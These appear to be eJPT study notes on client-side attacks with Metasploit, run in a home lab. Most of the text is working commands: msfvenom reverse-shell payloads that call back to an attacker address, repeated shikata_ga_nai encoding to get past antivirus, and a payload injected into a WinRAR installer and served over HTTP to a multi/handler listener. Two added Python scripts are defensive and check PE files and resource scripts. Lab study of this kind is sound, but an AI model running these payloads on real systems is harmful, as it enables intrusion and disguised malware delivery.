Client-Side Attacks with MSF
A client-side attack is a security breach that happens on the client side, i.e. on the user's machine rather than on a server.
- Social engineering techniques take advantage of human vulnerabilities
- Require user interaction to open malicious documents or portable executables (PEs)
- The payload is stored on the client's system
- Attackers have to pay attention to antivirus detection
❗ Advanced modern antivirus solutions detect and block this type of payload very easily.
Msfvenom Payloads
`msfvenom` is a Metasploit standalone payload generator and encoder.
e.g. generate a malicious meterpreter payload and transfer it to a client target; once executed it connects back to the payload handler and provides remote access.
- List available payloads
```bash
msfvenom --list payloads
```
- When generating a payload the exact name of the payload must be specified; the name encodes:
  - target operating system
  - target O.S. architecture (x64, x86 ...)
  - payload type
  - protocol used to connect back (depends on requirements)
- e.g. of a Staged payload: `windows/x64/meterpreter/reverse_tcp`
- e.g. of a Non-Staged payload: `windows/x64/meterpreter_reverse_https` (note the `/` between stage and stager in the staged name versus the `_` in the non-staged one)
- Generate a Windows payload with `msfvenom`

**32bit payload:**
```bash
# LHOST = Attacker IP address
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f exe > /home/kali/certs/ejpt/Windows_Payloads/payloadx86.exe
```
**64bit payload:**
```bash
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f exe > /home/kali/certs/ejpt/Windows_Payloads/payloadx64.exe
```
- List the output formats available
```
msfvenom --list formats

Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    ducky-script-psh
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    go
    golang
    hex
    java
    js_be
    js_le
    nim
    nimlang
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    rust
    rustlang
    sh
    vbapplication
    vbscript
```
- Generate a Linux payload with `msfvenom`

**32bit payload:**
```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f elf > /home/kali/certs/ejpt/Linux_Payloads/payloadx86
```
**64bit payload:**
```bash
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f elf > /home/kali/certs/ejpt/Linux_Payloads/payloadx64
```
- 📌 Platform and architecture are auto selected if not specified, based on the selected payload
The transfer method onto the target system depends on the type of social engineering technique used.
e.g. a simple web server can be set up on the attacker system to serve the payload files, plus a handler to receive the connection back from the target system
```bash
cd /home/kali/certs/ejpt/Windows_Payloads
sudo python -m http.server 8080
```
- To deal with a `meterpreter` payload, an appropriate listener is necessary to handle the reverse connection, the `multi/handler` Metasploit module in this case
```
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run
```
- Download the payload on the Windows 2008 system (in this case my home lab VM) from this link: http://192.168.31.128:8080
- Run the `payloadx86.exe` payload on the target
- The `meterpreter` session on the attacker machine should be opened

Same example with the `linux/x86/meterpreter/reverse_tcp` Linux payload executed on the Kali VM.
Signature-based antivirus solutions can detect malicious files or executables. Older AV solutions can be evaded by encoding the payloads.
- ❗ This kind of attack vector is outdated and hardly used today.
- May work on legacy O.S. like Windows 7 or older.
🗒️ Payload encoding involves changing the payload shellcode with the aim of changing the payload signature.
🗒️ Shellcode is the code typically used as a payload for exploitation, that provides a remote command shell on the target system.
- List the available encoders
```bash
msfvenom --list encoders
```
- Excellent encoders are `cmd/powershell_base64` and `x86/shikata_ga_nai`
- Generate a Win x86 payload and encode it with `shikata_ga_nai`:
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe
```
- The payload can be encoded as often as desired by increasing the number of iterations.
- The more iterations, the better the chances to bypass an antivirus. Use the `-i` option.
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > /home/kali/certs/ejpt/Linux_Payloads/encodedx86
```
- Test each of the above generated payloads, like before
```
cd /home/kali/certs/ejpt/Windows_Payloads
sudo python -m http.server 8080
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run
```
📌 Modern antivirus detects and blocks the encoded payload as soon as the download is started.
🗒️ Windows Portable Executable (PE) is a file format for executables, object code, DLLs and others, used in 32-bit and 64-bit Windows O.S.
- Download a portable executable, e.g. WinRAR
- Payloads can be injected into PEs with `msfvenom` using the `-x` and `-k` options
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -i 10 -f exe -x winrar-x32-621.exe > /home/kali/certs/ejpt/Windows_Payloads/winrar.exe
cd /home/kali/certs/ejpt/Windows_Payloads
sudo python -m http.server 8080
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run
```
- Transfer the `winrar.exe` file to the target O.S. and run it. The file description is kept, but not its functionality (the command above uses only `-x`; `-k` is the option that keeps the template program running).
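From the defender's side, a tampered installer like the one above still carries the original file description, so the check has to look at the binary itself. The following Python script is an added example (not part of these notes or of Metasploit): it parses a PE file's section table and applies heuristics analysts use on suspicious installers, namely a section that is both writable and executable, and an entry point that lies outside every section, in a non-executable section, or in the file's last section. `build_sample` constructs minimal PE32 headers as test input; they are not real programs, and the heuristics also fire on legitimately packed software, so treat a hit as a reason to look closer, not as a verdict.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_sections(data):
    """Return (entry_point_rva, sections) from raw PE bytes; ValueError if not a PE."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]           # e_lfanew in the DOS header
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]  # SizeOfOptionalHeader
    opt = pe_off + 24                                          # optional header start
    entry = struct.unpack_from("<I", data, opt + 16)[0]        # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        s = opt + opt_size + 40 * i                            # 40-byte section headers
        name, vsize, va = struct.unpack_from("<8sII", data, s)
        chars = struct.unpack_from("<I", data, s + 36)[0]      # Characteristics flags
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va,
                         "vsize": vsize, "chars": chars})
    return entry, sections


def suspicious_findings(data):
    """Apply the heuristics; an empty list means nothing stood out."""
    entry, sections = parse_sections(data)
    findings = []
    for sec in sections:
        if sec["chars"] & IMAGE_SCN_MEM_EXECUTE and sec["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {sec['name']} is writable and executable")
    holder = [s for s in sections if s["va"] <= entry < s["va"] + s["vsize"]]
    if not holder:
        findings.append("entry point outside every section")
    elif not holder[0]["chars"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry point in non-executable section {holder[0]['name']}")
    elif holder[0] is sections[-1] and len(sections) > 1:
        findings.append(f"entry point in last section {holder[0]['name']}")
    return findings


def build_sample(entry_rva, sections):
    """Constructed test input: a bare PE32 header with the given sections, not a real program."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)         # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    body = b"PE\0\0" + coff + bytes(opt)
    for name, va, size, chars in sections:                     # (name, VirtualAddress, size, flags)
        body += struct.pack("<8sIIIIIIHHI", name.encode(), size, va, size, 0, 0, 0, 0, 0, chars)
    return dos + body
```

Run `suspicious_findings(open(path, "rb").read())` against a downloaded installer; the section flags used in the samples are the standard `.text` (code, execute, read) and `.data` (initialized data, read, write) values.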
- Proceed with the Post Exploitation module to migrate the process into another one, in the `meterpreter` session
```
run post/windows/manage/migrate
```
Automation with Resource Scripts
Repetitive tasks and commands can be automated using MSF resource scripts (similar to batch scripts).
- Almost every MSF command can be automated.
- The resource scripts shipped with Metasploit live in `/usr/share/metasploit-framework/scripts/resource`
```bash
ls -al /usr/share/metasploit-framework/scripts/resource
```
**e.g. 1**
- Automate the process of setting up a handler for the generated payloads, by creating a new `handler.rc` file
```
nano handler.rc
# Insert the following lines
# by specifying the commands sequentially
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run
# Save it and exit
```
- Load and run the resource script in `msfconsole`
```bash
msfconsole -q -r handler.rc
```
**e.g. 2**
```
nano portscan.rc
# Insert the following lines
# by specifying the commands sequentially
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.31.131
run
# Save it and exit
msfconsole -q -r portscan.rc
```
**e.g. 3**
```
nano db_status.rc
db_status
workspace
workspace -a TEST
msfconsole -q -r db_status.rc
```
- 📌 Load up a resource script from within the `msfconsole` with the `resource` command
```
resource /home/kali/certs/ejpt/resource_scripts/handler.rc
```
- Commands typed in a new `msfconsole` session can be exported to a new resource script with `makerc`
```
makerc /home/kali/certs/ejpt/resource_scripts/portscan2.rc
```
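Because a resource script is just the console commands in order, it is easy to audit one before running it (or when an incident responder recovers one from a compromised host). The parser below is an added example, not part of these notes or of Metasploit: it splits a script into one block per `use` command, records each module's `set` options and whether it is run, and `handler_targets` pulls out the payload and callback address of every `multi/handler` block, the values a defender would turn into a network detection. It handles the plain one-command-per-line form with `#` comments shown above; embedded Ruby blocks are out of scope. `HANDLER_RC` is the handler.rc from e.g. 1, embedded as sample input.

```python
# Sample input: the handler.rc from the notes, embedded here for a stand-alone run
HANDLER_RC = """\
# Insert the following lines
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run
"""


def parse_resource_script(text):
    """Split an msfconsole resource script into blocks, one per 'use' command.

    Each block records the module, its 'set' options and whether it is run.
    Commands that appear outside any module (db_status, workspace ...) are kept
    as generic entries with module None, in file order.
    Plain one-command-per-line form only; embedded <ruby> blocks are not handled.
    """
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments and blank lines
        if not line:
            continue
        cmd, _, rest = line.partition(" ")
        rest = rest.strip()
        if cmd == "use":
            current = {"module": rest, "set": {}, "run": False}
            blocks.append(current)
        elif cmd == "set" and current is not None:
            key, _, value = rest.partition(" ")
            current["set"][key] = value.strip()
        elif cmd in ("run", "exploit") and current is not None:
            current["run"] = True
        else:
            blocks.append({"module": None, "command": line})
    return blocks


def handler_targets(blocks):
    """Return (payload, LHOST, LPORT) for every multi/handler block that is run."""
    out = []
    for b in blocks:
        if b.get("module") == "multi/handler" and b["run"]:
            opts = b["set"]
            out.append((opts.get("payload"), opts.get("LHOST"), opts.get("LPORT")))
    return out
```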